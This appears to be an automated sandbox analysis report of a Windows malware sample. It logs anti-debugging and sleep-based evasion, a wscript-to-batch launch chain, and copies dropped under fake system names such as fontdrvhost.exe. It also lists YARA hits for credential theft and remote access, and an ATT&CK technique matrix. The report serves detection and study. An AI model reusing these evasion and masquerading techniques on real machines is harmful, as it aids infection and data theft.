            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeMemory allocated: 1320000 memory reserve | memory write watchJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeMemory allocated: 1AFC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeMemory allocated: 1AE30000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeMemory allocated: 1630000 memory reserve | memory write watch
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeMemory allocated: 1B230000 memory reserve | memory write watch
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeMemory allocated: 3050000 memory reserve | memory write watch
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeMemory allocated: 1B2B0000 memory reserve | memory write watch
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeMemory allocated: 1640000 memory reserve | memory write watch
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeWindow / User API: threadDelayed 1888Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeWindow / User API: threadDelayed 367Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeWindow / User API: threadDelayed 365
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeWindow / User API: threadDelayed 365
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeWindow / User API: threadDelayed 365
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft OneDrive\setup\logs\Idle.exeJump to dropped file
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exe TID: 6820Thread sleep count: 1888 > 30Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exe TID: 3384Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe TID: 6896Thread sleep count: 367 > 30Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe TID: 5308Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe TID: 7316Thread sleep count: 365 > 30
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe TID: 7404Thread sleep count: 365 > 30
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe TID: 7460Thread sleep count: 365 > 30
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe TID: 7180Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_001DA5F4
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_001EB8E0
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EDD72 VirtualQuery,GetSystemInfo,0_2_001EDD72
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeThread delayed: delay time: 922337203685477
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\userJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: c62q1qZ8kX.exe, 00000000.00000003.1679882118.00000000026E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: c62q1qZ8kX.exe, mmeUVmNHPOdst.exe0.4.dr, mmeUVmNHPOdst.exe.4.dr, mmeUVmNHPOdst.exe2.4.dr, fontdrvhost.exe.4.dr, mmeUVmNHPOdst.exe3.4.dr, TextInputHost.exe.4.dr, WmiPrvSE.exe.4.dr, chainMonitor.exe.0.dr, Idle.exe.4.dr, mmeUVmNHPOdst.exe1.4.dr, conhost.exe.4.drBinary or memory string: rlcSOw8JW2XqemuVKQL
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeAPI call chain: ExitProcess graph end nodegraph_0-23658
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001F866F
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F753D mov eax, dword ptr fs:[00000030h]0_2_001F753D
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001FB710 GetProcessHeap,0_2_001FB710
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeProcess token adjusted: Debug
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess token adjusted: Debug
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EF063 SetUnhandledExceptionFilter,0_2_001EF063
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001EF22B
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001F866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001F866F
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001EEF05
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockrefSessionBrokerDll\5sVJrvWE.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockrefSessionBrokerDll\jNiINMcACfpGfudqTH4IxZpVWTbF.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockrefSessionBrokerDll\chainMonitor.exe "C:\blockrefSessionBrokerDll\chainMonitor.exe"Jump to behavior
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001EED5B cpuid 0_2_001EED5B
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_001EA63C
            Source: C:\blockrefSessionBrokerDll\chainMonitor.exeQueries volume information: C:\blockrefSessionBrokerDll\chainMonitor.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fontdrvhost.exe VolumeInformation
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeQueries volume information: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe VolumeInformation
            Source: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exeQueries volume information: C:\Users\Default\AppData\Local\Microsoft\Windows\History\mmeUVmNHPOdst.exe VolumeInformation
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001ED5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_001ED5D4
            Source: C:\Users\user\Desktop\c62q1qZ8kX.exeCode function: 0_2_001DACF5 GetVersionExW,0_2_001DACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000022.00000002.1884618745.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.1884278845.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1884618745.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1884618745.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1801910999.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1879455048.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1801910999.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.1884278845.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.1884137133.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: chainMonitor.exe PID: 6192, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3592, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 4444, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mmeUVmNHPOdst.exe PID: 2148, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mmeUVmNHPOdst.exe PID: 6556, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000022.00000002.1884618745.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.1884278845.00000000032F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1884618745.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1884618745.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1801910999.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1879455048.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1801910999.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.1884278845.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.1884137133.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: chainMonitor.exe PID: 6192, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 3592, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 4444, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mmeUVmNHPOdst.exe PID: 2148, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mmeUVmNHPOdst.exe PID: 6556, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            1
            Scheduled Task/Job
            11
            Process Injection
            113
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            11
            Scripting
            1
            Scheduled Task/Job
            1
            Disable or Modify Tools
            LSASS Memory121
            Security Software Discovery
            Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS31
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information
            Cached Domain Credentials3
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing
            DCSync37
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
